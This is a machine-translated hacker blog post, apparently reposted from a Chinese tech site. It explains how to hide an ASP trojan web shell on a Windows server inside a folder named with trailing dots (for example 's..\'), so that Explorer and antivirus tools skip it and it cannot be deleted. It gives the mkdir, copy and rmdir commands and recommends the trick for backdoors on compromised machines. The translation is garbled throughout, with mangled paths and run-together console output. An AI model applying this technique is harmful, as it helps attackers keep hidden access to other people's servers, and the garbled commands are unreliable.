Let ASP Trojans are not killed

xiaoxiao2021-03-06  80

Hacker back door: Let the ASP Troja are not killed, you want to say that it is modified asp Trojan, the code or encryption is called to escape the anti-virus, the wrong, this doesn't have to modify, and no one guarantees that the ASP you modified will not be killed by XX anti-virus software. Anyway, I am also lazy, huh, we run CMD, CD C: / Winnt / System32 / MyHome. That is, the address of your virtual directory turning, first talks, everyone knows that "/" symbol is the slot symbol of the path in Windows, such as "c: / windows /" means the Windows folder in the C partition, "C" : /Windows/system.exe meaning "The meaning of the system.exe file in the Windows folder in the C partition, so that we will assume that if there is a" / "symbol in the file name? If "S /" is the name of a folder, this folder is located in: "f: /", his path is "f: / s /", when we try to access, Windows will be wrong, think we have to open. The file is the s folder of the C partition so that Windows cannot open and return an error because the above path does not exist. Maybe you are trying to create a "S /" file now, but Windows will prompt you: "/" The symbol is not the name of the file, the folder. It seems that Windows still thinks this. OK We continue, do not believe that files containing "/" symbols cannot be established. Now open your computer, we have to do some very interesting attempts. After entering Windows, click: Start> Run and enter "CMD" and the car (if you are win98, enter "command"), then you will see Windows command console, we just want to use it to complete our remaining test The following contains a lot of commands in which characters in {} are my comment: Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.c: / WinNT / System32 / MyHome> mkdir s / { Our first attempt, the result of Windows only created S folder "/" is ignored} C: / Winnt / System32 / myHome> MKDIR S / S1 / {still failed, Windows creates a S folder first, then Create S1 folder} C: / winnt / system32 / myHome> mkdir s. / {"S. /" Is parsed to S "./" is ignored to S ./ "It has existed. C: / Winnt / System32 / MyHome> Mkdir s ../ {Finally, now you can see "s." in the Explorer, but you can't open / delete} C: / Winnt / System32 / MyHome> Mkdir S ... / {Successful, can blow in the resource browser? S .. "You can open but you can't delete} ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------- Why is this? Let's first say this "S." folder you see, he can't open and you can't delete it. Open because his actual path is "C: / Winnt / System32 / myHome / s ../" (which we can create, you can determine his actual path), but the name in the Windows Explorer becomes "S. "That is to say, when you try to open it, Windows actually tries to open" c: /winnt/system32/myHome/s./ "Of course, it is not possible, the file does not exist, so Windows will report error. Can't delete it because This, Windows parses an actually existing file path to a non-existing path, and the XX action cannot be done.

This file is said, this file can be opened, but it can't be deleted. Wait ... Open? Do you think that Windows really opens the "s ... /" file we created? You will understand the following test. Or the old rule {} is my annotation convenient for everyone to understand: ------------------------------------- --------- Microsoft Windows XP [Version 5.1.2600] (c) Copyright 1985-2001 Microsoft Corp.c: / Winnt / System32 / MyHome> Copy Net.asp s ../ {copy Just you ASP's Trojan files to "s ../", "S." of the resource manager} has copied 1 file. C: / Winnt / System32 / MyHome> ------------------------------------------------------------------------------------------------------------------------------------------------------------- ----- Now return to your resource manager to open the "S." folder, what did you see? How will "net.asp" file here? We just replicated to "S."? Isn't we open "S." folder actually open "s"? Nice fact is like this. In fact, if you create a "S" folder "S." to open, but actually open "S". This is a key topic. In fact, we use the S. directory that is not killed to hide our Trojan, regardless of the Trojan to poison, but the general exe file cannot be running in S. Such a directory, but ASP Trojans can! You can execute the CMD command by browsing, copy Net.asp to s. Directory, remove Net.asp, we are in the browser http://127.0.0.1/kiss/kiss/s../net.asp

You can see that the ASP Trojan is coming, and the general user can't find him. Even if the professional anti-virus software will only go to "s" and skip "s ../", let's talk about deletion. Method Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.f: / Test> DIR Drive F is the serial number of the bgting volume is 2C8E-Fe1cf: / test directory 2003- 09-11 17:50

.2003-09-11 17:50 ..2003-09-11 18:35 S.2003-09-11 18:37 s .. 1 file 9 bytes 5 directory 3,390,029,824 Available bytes C: / Winnt / System32 / MyHome> RMDir s ../ directory is not empty. C: / Winnt / System32 / MyHome> RMDir s ../ /ss../ Does it confirm (Y / N)? YC: / Winnt / System32 / MyHome> RMDir s ... / //ss.../, Is it confirmed (y / n)? Y this doesn't have to worry about getting bad you broiler, so there is such a very hidden back door to build, and will not be killed, if on the broiler, the above should be tested at 3389.

转载请注明原文地址:https://www.9cbs.com/read-121583.html

New Post(0)